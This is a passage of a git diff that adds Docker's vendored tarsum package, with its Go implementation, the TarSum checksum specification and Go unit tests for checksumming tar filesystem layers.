+		fileInfoSum{name: "file3", sum: "2abcdef1234567890", pos: 2},
+		fileInfoSum{name: "dup1", sum: "deadbeef1", pos: 5},
+		fileInfoSum{name: "file1", sum: "0abcdef1234567890", pos: 0},
+		fileInfoSum{name: "file4", sum: "3abcdef1234567890", pos: 3},
+		fileInfoSum{name: "dup1", sum: "deadbeef0", pos: 4},
+		fileInfoSum{name: "file2", sum: "1abcdef1234567890", pos: 1},
+	}
+}
+
+func TestSortFileInfoSums(t *testing.T) {
+	dups := newFileInfoSums().GetAllFile("dup1")
+	if len(dups) != 2 {
+		t.Errorf("expected length 2, got %d", len(dups))
+	}
+	dups.SortByNames()
+	if dups[0].Pos() != 4 {
+		t.Errorf("sorted dups should be ordered by position. Expected 4, got %d", dups[0].Pos())
+	}
+
+	fis := newFileInfoSums()
+	expected := "0abcdef1234567890"
+	fis.SortBySums()
+	got := fis[0].Sum()
+	if got != expected {
+		t.Errorf("Expected %q, got %q", expected, got)
+	}
+
+	fis = newFileInfoSums()
+	expected = "dup1"
+	fis.SortByNames()
+	gotFis := fis[0]
+	if gotFis.Name() != expected {
+		t.Errorf("Expected %q, got %q", expected, gotFis.Name())
+	}
+	// since a duplicate is first, ensure it is ordered first by position too
+	if gotFis.Pos() != 4 {
+		t.Errorf("Expected %d, got %d", 4, gotFis.Pos())
+	}
+
+	fis = newFileInfoSums()
+	fis.SortByPos()
+	if fis[0].Pos() != 0 {
+		t.Errorf("sorted fileInfoSums by Pos should order them by position.")
+	}
+
+	fis = newFileInfoSums()
+	expected = "deadbeef1"
+	gotFileInfoSum := fis.GetFile("dup1")
+	if gotFileInfoSum.Sum() != expected {
+		t.Errorf("Expected %q, got %q", expected, gotFileInfoSum)
+	}
+	if fis.GetFile("noPresent") != nil {
+		t.Errorf("Should have return nil if name not found.")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
new file mode 100644
index 0000000000..154788db82
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
@@ -0,0 +1,295 @@
+// Package tarsum provides algorithms to perform checksum calculation on
+// filesystem layers.
+//
+// The transportation of filesystems, regarding Docker, is done with tar(1)
+// archives. There are a variety of tar serialization formats [2], and a key
+// concern here is ensuring a repeatable checksum given a set of inputs from a
+// generic tar archive. Types of transportation include distribution to and from a
+// registry endpoint, saving and loading through commands or Docker daemon APIs,
+// transferring the build context from client to Docker daemon, and committing the
+// filesystem of a container to become an image.
+//
+// As tar archives are used for transit, but not preserved in many situations, the
+// focus of the algorithm is to ensure the integrity of the preserved filesystem,
+// while maintaining a deterministic accountability. This includes neither
+// constraining the ordering or manipulation of the files during the creation or
+// unpacking of the archive, nor include additional metadata state about the file
+// system attributes.
+package tarsum
+
+import (
+	"archive/tar"
+	"bytes"
+	"compress/gzip"
+	"crypto"
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"hash"
+	"io"
+	"path"
+	"strings"
+)
+
+const (
+	buf8K  = 8 * 1024
+	buf16K = 16 * 1024
+	buf32K = 32 * 1024
+)
+
+// NewTarSum creates a new interface for calculating a fixed time checksum of a
+// tar archive.
+//
+// This is used for calculating checksums of layers of an image, in some cases
+// including the byte payload of the image's json metadata as well, and for
+// calculating the checksums for buildcache.
+func NewTarSum(r io.Reader, dc bool, v Version) (TarSum, error) {
+	return NewTarSumHash(r, dc, v, DefaultTHash)
+}
+
+// NewTarSumHash creates a new TarSum, providing a THash to use rather than
+// the DefaultTHash.
+func NewTarSumHash(r io.Reader, dc bool, v Version, tHash THash) (TarSum, error) {
+	headerSelector, err := getTarHeaderSelector(v)
+	if err != nil {
+		return nil, err
+	}
+	ts := &tarSum{Reader: r, DisableCompression: dc, tarSumVersion: v, headerSelector: headerSelector, tHash: tHash}
+	err = ts.initTarSum()
+	return ts, err
+}
+
+// NewTarSumForLabel creates a new TarSum using the provided TarSum version+hash label.
+func NewTarSumForLabel(r io.Reader, disableCompression bool, label string) (TarSum, error) {
+	parts := strings.SplitN(label, "+", 2)
+	if len(parts) != 2 {
+		return nil, errors.New("tarsum label string should be of the form: {tarsum_version}+{hash_name}")
+	}
+
+	versionName, hashName := parts[0], parts[1]
+
+	version, ok := tarSumVersionsByName[versionName]
+	if !ok {
+		return nil, fmt.Errorf("unknown TarSum version name: %q", versionName)
+	}
+
+	hashConfig, ok := standardHashConfigs[hashName]
+	if !ok {
+		return nil, fmt.Errorf("unknown TarSum hash name: %q", hashName)
+	}
+
+	tHash := NewTHash(hashConfig.name, hashConfig.hash.New)
+
+	return NewTarSumHash(r, disableCompression, version, tHash)
+}
+
+// TarSum is the generic interface for calculating fixed time
+// checksums of a tar archive.
+type TarSum interface {
+	io.Reader
+	GetSums() FileInfoSums
+	Sum([]byte) string
+	Version() Version
+	Hash() THash
+}
+
+// tarSum struct is the structure for a Version0 checksum calculation.
+type tarSum struct {
+	io.Reader
+	tarR               *tar.Reader
+	tarW               *tar.Writer
+	writer             writeCloseFlusher
+	bufTar             *bytes.Buffer
+	bufWriter          *bytes.Buffer
+	bufData            []byte
+	h                  hash.Hash
+	tHash              THash
+	sums               FileInfoSums
+	fileCounter        int64
+	currentFile        string
+	finished           bool
+	first              bool
+	DisableCompression bool              // false by default. When false, the output gzip compressed.
+	tarSumVersion      Version           // this field is not exported so it can not be mutated during use
+	headerSelector     tarHeaderSelector // handles selecting and ordering headers for files in the archive
+}
+
+func (ts tarSum) Hash() THash {
+	return ts.tHash
+}
+
+func (ts tarSum) Version() Version {
+	return ts.tarSumVersion
+}
+
+// THash provides a hash.Hash type generator and its name.
+type THash interface {
+	Hash() hash.Hash
+	Name() string
+}
+
+// NewTHash is a convenience method for creating a THash.
+func NewTHash(name string, h func() hash.Hash) THash {
+	return simpleTHash{n: name, h: h}
+}
+
+type tHashConfig struct {
+	name string
+	hash crypto.Hash
+}
+
+var (
+	// NOTE: DO NOT include MD5 or SHA1, which are considered insecure.
+	standardHashConfigs = map[string]tHashConfig{
+		"sha256": {name: "sha256", hash: crypto.SHA256},
+		"sha512": {name: "sha512", hash: crypto.SHA512},
+	}
+)
+
+// DefaultTHash is default TarSum hashing algorithm - "sha256".
+var DefaultTHash = NewTHash("sha256", sha256.New)
+
+type simpleTHash struct {
+	n string
+	h func() hash.Hash
+}
+
+func (sth simpleTHash) Name() string    { return sth.n }
+func (sth simpleTHash) Hash() hash.Hash { return sth.h() }
+
+func (ts *tarSum) encodeHeader(h *tar.Header) error {
+	for _, elem := range ts.headerSelector.selectHeaders(h) {
+		if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (ts *tarSum) initTarSum() error {
+	ts.bufTar = bytes.NewBuffer([]byte{})
+	ts.bufWriter = bytes.NewBuffer([]byte{})
+	ts.tarR = tar.NewReader(ts.Reader)
+	ts.tarW = tar.NewWriter(ts.bufTar)
+	if !ts.DisableCompression {
+		ts.writer = gzip.NewWriter(ts.bufWriter)
+	} else {
+		ts.writer = &nopCloseFlusher{Writer: ts.bufWriter}
+	}
+	if ts.tHash == nil {
+		ts.tHash = DefaultTHash
+	}
+	ts.h = ts.tHash.Hash()
+	ts.h.Reset()
+	ts.first = true
+	ts.sums = FileInfoSums{}
+	return nil
+}
+
+func (ts *tarSum) Read(buf []byte) (int, error) {
+	if ts.finished {
+		return ts.bufWriter.Read(buf)
+	}
+	if len(ts.bufData) < len(buf) {
+		switch {
+		case len(buf) <= buf8K:
+			ts.bufData = make([]byte, buf8K)
+		case len(buf) <= buf16K:
+			ts.bufData = make([]byte, buf16K)
+		case len(buf) <= buf32K:
+			ts.bufData = make([]byte, buf32K)
+		default:
+			ts.bufData = make([]byte, len(buf))
+		}
+	}
+	buf2 := ts.bufData[:len(buf)]
+
+	n, err := ts.tarR.Read(buf2)
+	if err != nil {
+		if err == io.EOF {
+			if _, err := ts.h.Write(buf2[:n]); err != nil {
+				return 0, err
+			}
+			if !ts.first {
+				ts.sums = append(ts.sums, fileInfoSum{name: ts.currentFile, sum: hex.EncodeToString(ts.h.Sum(nil)), pos: ts.fileCounter})
+				ts.fileCounter++
+				ts.h.Reset()
+			} else {
+				ts.first = false
+			}
+
+			currentHeader, err := ts.tarR.Next()
+			if err != nil {
+				if err == io.EOF {
+					if err := ts.tarW.Close(); err != nil {
+						return 0, err
+					}
+					if _, err := io.Copy(ts.writer, ts.bufTar); err != nil {
+						return 0, err
+					}
+					if err := ts.writer.Close(); err != nil {
+						return 0, err
+					}
+					ts.finished = true
+					return n, nil
+				}
+				return n, err
+			}
+			ts.currentFile = path.Clean(currentHeader.Name)
+			if err := ts.encodeHeader(currentHeader); err != nil {
+				return 0, err
+			}
+			if err := ts.tarW.WriteHeader(currentHeader); err != nil {
+				return 0, err
+			}
+			if _, err := ts.tarW.Write(buf2[:n]); err != nil {
+				return 0, err
+			}
+			ts.tarW.Flush()
+			if _, err := io.Copy(ts.writer, ts.bufTar); err != nil {
+				return 0, err
+			}
+			ts.writer.Flush()
+
+			return ts.bufWriter.Read(buf)
+		}
+		return n, err
+	}
+
+	// Filling the hash buffer
+	if _, err = ts.h.Write(buf2[:n]); err != nil {
+		return 0, err
+	}
+
+	// Filling the tar writer
+	if _, err = ts.tarW.Write(buf2[:n]); err != nil {
+		return 0, err
+	}
+	ts.tarW.Flush()
+
+	// Filling the output writer
+	if _, err = io.Copy(ts.writer, ts.bufTar); err != nil {
+		return 0, err
+	}
+	ts.writer.Flush()
+
+	return ts.bufWriter.Read(buf)
+}
+
+func (ts *tarSum) Sum(extra []byte) string {
+	ts.sums.SortBySums()
+	h := ts.tHash.Hash()
+	if extra != nil {
+		h.Write(extra)
+	}
+	for _, fis := range ts.sums {
+		h.Write([]byte(fis.Sum()))
+	}
+	checksum := ts.Version().String() + "+" + ts.tHash.Name() + ":" + hex.EncodeToString(h.Sum(nil))
+	return checksum
+}
+
+func (ts *tarSum) GetSums() FileInfoSums {
+	return ts.sums
+}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md
new file mode 100644
index 0000000000..89b2e49f98
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md
@@ -0,0 +1,230 @@
+page_title: TarSum checksum specification
+page_description: Documentation for algorithms used in the TarSum checksum calculation
+page_keywords: docker, checksum, validation, tarsum
+
+# TarSum Checksum Specification
+
+## Abstract
+
+This document describes the algorithms used in performing the TarSum checksum
+calculation on filesystem layers, the need for this method over existing
+methods, and the versioning of this calculation.
+
+## Warning
+
+This checksum algorithm is for best-effort comparison of file trees with fuzzy logic.
+
+This is _not_ a cryptographic attestation, and should not be considered secure.
+
+## Introduction
+
+The transportation of filesystems, regarding Docker, is done with tar(1)
+archives. There are a variety of tar serialization formats [2], and a key
+concern here is ensuring a repeatable checksum given a set of inputs from a
+generic tar archive. Types of transportation include distribution to and from a
+registry endpoint, saving and loading through commands or Docker daemon APIs,
+transferring the build context from client to Docker daemon, and committing the
+filesystem of a container to become an image.
+
+As tar archives are used for transit, but not preserved in many situations, the
+focus of the algorithm is to ensure the integrity of the preserved filesystem,
+while maintaining a deterministic accountability. This includes neither
+constraining the ordering or manipulation of the files during the creation or
+unpacking of the archive, nor include additional metadata state about the file
+system attributes.
+
+## Intended Audience
+
+This document is outlining the methods used for consistent checksum calculation
+for filesystems transported via tar archives.
+
+Auditing these methodologies is an open and iterative process. This document
+should accommodate the review of source code. Ultimately, this document should
+be the starting point of further refinements to the algorithm and its future
+versions.
+
+## Concept
+
+The checksum mechanism must ensure the integrity and assurance of the
+filesystem payload.
+
+## Checksum Algorithm Profile
+
+A checksum mechanism must define the following operations and attributes:
+
+* Associated hashing cipher - used to checksum each file payload and attribute
+  information.
+* Checksum list - each file of the filesystem archive has its checksum
+  calculated from the payload and attributes of the file. The final checksum is
+  calculated from this list, with specific ordering.
+* Version - as the algorithm adapts to requirements, there are behaviors of the
+  algorithm to manage by versioning.
+* Archive being calculated - the tar archive having its checksum calculated
+
+## Elements of TarSum checksum
+
+The calculated sum output is a text string. The elements included in the output
+of the calculated sum comprise the information needed for validation of the sum
+(TarSum version and hashing cipher used) and the expected checksum in hexadecimal
+form.
+
+There are two delimiters used:
+* '+' separates TarSum version from hashing cipher
+* ':' separates calculation mechanics from expected hash
+
+Example:
+
+```
+	"tarsum.v1+sha256:220a60ecd4a3c32c282622a625a54db9ba0ff55b5ba9c29c7064a2bc358b6a3e"
+	|         |       \                                                               |
+	|         |        \                                                              |
+	|_version_|_cipher__|__                                                           |
+	|                      \                                                          |
+	|_calculation_mechanics_|______________________expected_sum_______________________|
+```
+
+## Versioning
+
+Versioning was introduced [0] to accommodate differences in calculation needed,
+and ability to maintain reverse compatibility.
+
+The general algorithm will be describe further in the 'Calculation'.
+
+### Version0
+
+This is the initial version of TarSum.
+
+Its element in the TarSum checksum string is `tarsum`.
+
+### Version1
+
+Its element in the TarSum checksum is `tarsum.v1`.
+
+The notable changes in this version:
+* Exclusion of file `mtime` from the file information headers, in each file
+  checksum calculation
+* Inclusion of extended attributes (`xattrs`. Also seen as `SCHILY.xattr.` prefixed Pax
+  tar file info headers) keys and values in each file checksum calculation
+
+### VersionDev
+
+*Do not use unless validating refinements to the checksum algorithm*
+
+Its element in the TarSum checksum is `tarsum.dev`.
+
+This is a floating place holder for a next version and grounds for testing
+changes. The methods used for calculation are subject to change without notice,
+and this version is for testing and not for production use.
+
+## Ciphers
+
+The official default and standard hashing cipher used in the calculation mechanic
+is `sha256`. This refers to SHA256 hash algorithm as defined in FIPS 180-4.
+
+Though the TarSum algorithm itself is not exclusively bound to the single
+hashing cipher `sha256`, support for alternate hashing ciphers was later added
+[1]. Use cases for alternate cipher could include future-proofing TarSum
+checksum format and using faster cipher hashes for tar filesystem checksums.
+
+## Calculation
+
+### Requirement
+
+As mentioned earlier, the calculation is such that it takes into consideration
+the lifecycle of the tar archive. In that the tar archive is not an immutable,
+permanent artifact. Otherwise options like relying on a known hashing cipher
+checksum of the archive itself would be reliable enough. The tar archive of the
+filesystem is used as a transportation medium for Docker images, and the
+archive is discarded once its contents are extracted. Therefore, for consistent
+validation items such as order of files in the tar archive and time stamps are
+subject to change once an image is received.
+
+### Process
+
+The method is typically iterative due to reading tar info headers from the
+archive stream, though this is not a strict requirement.
+
+#### Files
+
+Each file in the tar archive have their contents (headers and body) checksummed
+individually using the designated associated hashing cipher. The ordered
+headers of the file are written to the checksum calculation first, and then the
+payload of the file body.
+
+The resulting checksum of the file is appended to the list of file sums. The
+sum is encoded as a string of the hexadecimal digest. Additionally, the file
+name and position in the archive is kept as reference for special ordering.
+
+#### Headers
+
+The following headers are read, in this
+order ( and the corresponding representation of its value):
+* 'name' - string
+* 'mode' - string of the base10 integer
+* 'uid' - string of the integer
+* 'gid' - string of the integer
+* 'size' - string of the integer
+* 'mtime' (_Version0 only_) - string of integer of the seconds since 1970-01-01 00:00:00 UTC
+* 'typeflag' - string of the char
+* 'linkname' - string
+* 'uname' - string
+* 'gname' - string
+* 'devmajor' - string of the integer
+* 'devminor' - string of the integer
+
+For >= Version1, the extended attribute headers ("SCHILY.xattr." prefixed pax
+headers) included after the above list. These xattrs key/values are first
+sorted by the keys.
+
+#### Header Format
+
+The ordered headers are written to the hash in the format of
+
+	"{.key}{.value}"
+
+with no newline.
+
+#### Body
+
+After the order headers of the file have been added to the checksum for the
+file, the body of the file is written to the hash.
+
+#### List of file sums
+
+The list of file sums is sorted by the string of the hexadecimal digest.
+
+If there are two files in the tar with matching paths, the order of occurrence
+for that path is reflected for the sums of the corresponding file header and
+body.
+
+#### Final Checksum
+
+Begin with a fresh or initial state of the associated hash cipher. If there is
+additional payload to include in the TarSum calculation for the archive, it is
+written first. Then each checksum from the ordered list of file sums is written
+to the hash.
+
+The resulting digest is formatted per the Elements of TarSum checksum,
+including the TarSum version, the associated hash cipher and the hexadecimal
+encoded checksum digest.
+
+## Security Considerations
+
+The initial version of TarSum has undergone one update that could invalidate
+handcrafted tar archives. The tar archive format supports appending of files
+with same names as prior files in the archive. The latter file will clobber the
+prior file of the same path. Due to this the algorithm now accounts for files
+with matching paths, and orders the list of file sums accordingly [3].
+
+## Footnotes
+
+* [0] Versioning https://github.com/docker/docker/commit/747f89cd327db9d50251b17797c4d825162226d0
+* [1] Alternate ciphers https://github.com/docker/docker/commit/4e9925d780665149b8bc940d5ba242ada1973c4e
+* [2] Tar http://en.wikipedia.org/wiki/Tar_%28computing%29
+* [3] Name collision https://github.com/docker/docker/commit/c5e6362c53cbbc09ddbabd5a7323e04438b57d31
+
+## Acknowledgments
+
+Joffrey F (shin-) and Guillaume J. Charmes (creack) on the initial work of the
+TarSum calculation.
+
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
new file mode 100644
index 0000000000..86df0e2b89
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
@@ -0,0 +1,664 @@
+package tarsum
+
+import (
+	"archive/tar"
+	"bytes"
+	"compress/gzip"
+	"crypto/md5"
+	"crypto/rand"
+	"crypto/sha1"
+	"crypto/sha256"
+	"crypto/sha512"
+	"encoding/hex"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+)
+
+type testLayer struct {
+	filename string
+	options  *sizedOptions
+	jsonfile string
+	gzip     bool
+	tarsum   string
+	version  Version
+	hash     THash
+}
+
+var testLayers = []testLayer{
+	{
+		filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar",
+		jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json",
+		version:  Version0,
+		tarsum:   "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"},
+	{
+		filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar",
+		jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json",
+		version:  VersionDev,
+		tarsum:   "tarsum.dev+sha256:db56e35eec6ce65ba1588c20ba6b1ea23743b59e81fb6b7f358ccbde5580345c"},
+	{
+		filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar",
+		jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json",
+		gzip:     true,
+		tarsum:   "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"},
+	{
+		// Tests existing version of TarSum when xattrs are present
+		filename: "testdata/xattr/layer.tar",
+		jsonfile: "testdata/xattr/json",
+		version:  Version0,
+		tarsum:   "tarsum+sha256:07e304a8dbcb215b37649fde1a699f8aeea47e60815707f1cdf4d55d25ff6ab4"},
+	{
+		// Tests next version of TarSum when xattrs are present
+		filename: "testdata/xattr/layer.tar",
+		jsonfile: "testdata/xattr/json",
+		version:  VersionDev,
+		tarsum:   "tarsum.dev+sha256:6c58917892d77b3b357b0f9ad1e28e1f4ae4de3a8006bd3beb8beda214d8fd16"},
+	{
+		filename: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar",
+		jsonfile: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json",
+		tarsum:   "tarsum+sha256:c66bd5ec9f87b8f4c6135ca37684618f486a3dd1d113b138d0a177bfa39c2571"},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+sha256:8bf12d7e67c51ee2e8306cba569398b1b9f419969521a12ffb9d8875e8836738"},
+	{
+		// this tar has two files with the same path
+		filename: "testdata/collision/collision-0.tar",
+		tarsum:   "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"},
+	{
+		// this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above
+		filename: "testdata/collision/collision-1.tar",
+		tarsum:   "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"},
+	{
+		// this tar has newer of collider-0.tar, ensuring is has different hash
+		filename: "testdata/collision/collision-2.tar",
+		tarsum:   "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"},
+	{
+		// this tar has newer of collider-1.tar, ensuring is has different hash
+		filename: "testdata/collision/collision-3.tar",
+		tarsum:   "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+md5:0d7529ec7a8360155b48134b8e599f53",
+		hash:    md5THash,
+	},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+sha1:f1fee39c5925807ff75ef1925e7a23be444ba4df",
+		hash:    sha1Hash,
+	},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+sha224:6319390c0b061d639085d8748b14cd55f697cf9313805218b21cf61c",
+		hash:    sha224Hash,
+	},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+sha384:a578ce3ce29a2ae03b8ed7c26f47d0f75b4fc849557c62454be4b5ffd66ba021e713b48ce71e947b43aab57afd5a7636",
+		hash:    sha384Hash,
+	},
+	{
+		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
+		tarsum:  "tarsum+sha512:e9bfb90ca5a4dfc93c46ee061a5cf9837de6d2fdf82544d6460d3147290aecfabf7b5e415b9b6e72db9b8941f149d5d69fb17a394cbfaf2eac523bd9eae21855",
+		hash:    sha512Hash,
+	},
+}
+
+type sizedOptions struct {
+	num      int64
+	size     int64
+	isRand   bool
+	realFile bool
+}
+
+// make a tar:
+// * num is the number of files the tar should have
+// * size is the bytes per file
+// * isRand is whether the contents of the files should be a random chunk (otherwise it's all zeros)
+// * realFile will write to a TempFile, instead of an in memory buffer
+func sizedTar(opts sizedOptions) io.Reader {
+	var (
+		fh  io.ReadWriter
+		err error
+	)
+	if opts.realFile {
+		fh, err = ioutil.TempFile("", "tarsum")
+		if err != nil {
+			return nil
+		}
+	} else {
+		fh = bytes.NewBuffer([]byte{})
+	}
+	tarW := tar.NewWriter(fh)
+	defer tarW.Close()
+	for i := int64(0); i < opts.num; i++ {
+		err := tarW.WriteHeader(&tar.Header{
+			Name: fmt.Sprintf("/testdata%d", i),
+			Mode: 0755,
+			Uid:  0,
+			Gid:  0,
+			Size: opts.size,
+		})
+		if err != nil {
+			return nil
+		}
+		var rBuf []byte
+		if opts.isRand {
+			rBuf = make([]byte, 8)
+			_, err = rand.Read(rBuf)
+			if err != nil {
+				return nil
+			}
+		} else {
+			rBuf = []byte{0, 0, 0, 0, 0, 0, 0, 0}
+		}
+
+		for i := int64(0); i < opts.size/int64(8); i++ {
+			tarW.Write(rBuf)
+		}
+	}
+	return fh
+}
+
+func emptyTarSum(gzip bool) (TarSum, error) {
+	reader, writer := io.Pipe()
+	tarWriter := tar.NewWriter(writer)
+
+	// Immediately close tarWriter and write-end of the
+	// Pipe in a separate goroutine so we don't block.
+	go func() {
+		tarWriter.Close()
+		writer.Close()
+	}()
+
+	return NewTarSum(reader, !gzip, Version0)
+}
+
+// Test errors on NewTarsumForLabel
+func TestNewTarSumForLabelInvalid(t *testing.T) {
+	reader := strings.NewReader("")
+
+	if _, err := NewTarSumForLabel(reader, true, "invalidlabel"); err == nil {
+		t.Fatalf("Expected an error, got nothing.")
+	}
+
+	if _, err := NewTarSumForLabel(reader, true, "invalid+sha256"); err == nil {
+		t.Fatalf("Expected an error, got nothing.")
+	}
+	if _, err := NewTarSumForLabel(reader, true, "tarsum.v1+invalid"); err == nil {
+		t.Fatalf("Expected an error, got nothing.")
+	}
+}
+
+func TestNewTarSumForLabel(t *testing.T) {
+
+	layer := testLayers[0]
+
+	reader, err := os.Open(layer.filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer reader.Close()
+
+	label := strings.Split(layer.tarsum, ":")[0]
+	ts, err := NewTarSumForLabel(reader, false, label)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Make sure it actually worked by reading a little bit of it
+	nbByteToRead := 8 * 1024
+	dBuf := make([]byte, nbByteToRead)
+	_, err = ts.Read(dBuf)
+	if err != nil {
+		t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err)
+	}
+}
+
+// TestEmptyTar tests that tarsum does not fail to read an empty tar
+// and correctly returns the hex digest of an empty hash.
+func TestEmptyTar(t *testing.T) {
+	// Test without gzip.
+	ts, err := emptyTarSum(false)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	zeroBlock := make([]byte, 1024)
+	buf := new(bytes.Buffer)
+
+	n, err := io.Copy(buf, ts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) {
+		t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n)
+	}
+
+	expectedSum := ts.Version().String() + "+sha256:" + hex.EncodeToString(sha256.New().Sum(nil))
+	resultSum := ts.Sum(nil)
+
+	if resultSum != expectedSum {
+		t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum)
+	}
+
+	// Test with gzip.
+	ts, err = emptyTarSum(true)
+	if err != nil {
+		t.Fatal(err)
+	}
+	buf.Reset()
+
+	n, err = io.Copy(buf, ts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	bufgz := new(bytes.Buffer)
+	gz := gzip.NewWriter(bufgz)
+	n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock))
+	gz.Close()
+	gzBytes := bufgz.Bytes()
+
+	if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), gzBytes) {
+		t.Fatalf("tarSum did not write the correct number of gzipped-zeroed bytes: %d", n)
+	}
+
+	resultSum = ts.Sum(nil)
+
+	if resultSum != expectedSum {
+		t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum)
+	}
+
+	// Test without ever actually writing anything.
+	if ts, err = NewTarSum(bytes.NewReader([]byte{}), true, Version0); err != nil {
+		t.Fatal(err)
+	}
+
+	resultSum = ts.Sum(nil)
+
+	if resultSum != expectedSum {
+		t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum)
+	}
+}
+
+var (
+	md5THash   = NewTHash("md5", md5.New)
+	sha1Hash   = NewTHash("sha1", sha1.New)
+	sha224Hash = NewTHash("sha224", sha256.New224)
+	sha384Hash = NewTHash("sha384", sha512.New384)
+	sha512Hash = NewTHash("sha512", sha512.New)
+)
+
+// Test all the build-in read size : buf8K, buf16K, buf32K and more
+func TestTarSumsReadSize(t *testing.T) {
+	// Test always on the same layer (that is big enough)
+	layer := testLayers[0]
+
+	for i := 0; i < 5; i++ {
+
+		reader, err := os.Open(layer.filename)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer reader.Close()
+
+		ts, err := NewTarSum(reader, false, layer.version)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		// Read and discard bytes so that it populates sums
+		nbByteToRead := (i + 1) * 8 * 1024
+		dBuf := make([]byte, nbByteToRead)
+		_, err = ts.Read(dBuf)
+		if err != nil {
+			t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err)
+			continue
+		}
+	}
+}
+
+func TestTarSums(t *testing.T) {
+	for _, layer := range testLayers {
+		var (
+			fh  io.Reader
+			err error
+		)
+		if len(layer.filename) > 0 {
+			fh, err = os.Open(layer.filename)
+			if err != nil {
+				t.Errorf("failed to open %s: %s", layer.filename, err)
+				continue
+			}
+		} else if layer.options != nil {
+			fh = sizedTar(*layer.options)
+		} else {
+			// What else is there to test?
+			t.Errorf("what to do with %#v", layer)
+			continue
+		}
+		if file, ok := fh.(*os.File); ok {
+			defer file.Close()
+		}
+
+		var ts TarSum
+		if layer.hash == nil {
+			//                           double negatives!
+			ts, err = NewTarSum(fh, !layer.gzip, layer.version)
+		} else {
+			ts, err = NewTarSumHash(fh, !layer.gzip, layer.version, layer.hash)
+		}
+		if err != nil {
+			t.Errorf("%q :: %q", err, layer.filename)
+			continue
+		}
+
+		// Read variable number of bytes to test dynamic buffer
+		dBuf := make([]byte, 1)
+		_, err = ts.Read(dBuf)
+		if err != nil {
+			t.Errorf("failed to read 1B from %s: %s", layer.filename, err)
+			continue
+		}
+		dBuf = make([]byte, 16*1024)
+		_, err = ts.Read(dBuf)
+		if err != nil {
+			t.Errorf("failed to read 16KB from %s: %s", layer.filename, err)
+			continue
+		}
+
+		// Read and discard remaining bytes
+		_, err = io.Copy(ioutil.Discard, ts)
+		if err != nil {
+			t.Errorf("failed to copy from %s: %s", layer.filename, err)
+			continue
+		}
+		var gotSum string
+		if len(layer.jsonfile) > 0 {
+			jfh, err := os.Open(layer.jsonfile)
+			if err != nil {
+				t.Errorf("failed to open %s: %s", layer.jsonfile, err)
+				continue
+			}
+			defer jfh.Close()
+
+			buf, err := ioutil.ReadAll(jfh)
+			if err != nil {
+				t.Errorf("failed to readAll %s: %s", layer.jsonfile, err)
+				continue
+			}
+			gotSum = ts.Sum(buf)
+		} else {
+			gotSum = ts.Sum(nil)
+		}
+
+		if layer.tarsum != gotSum {
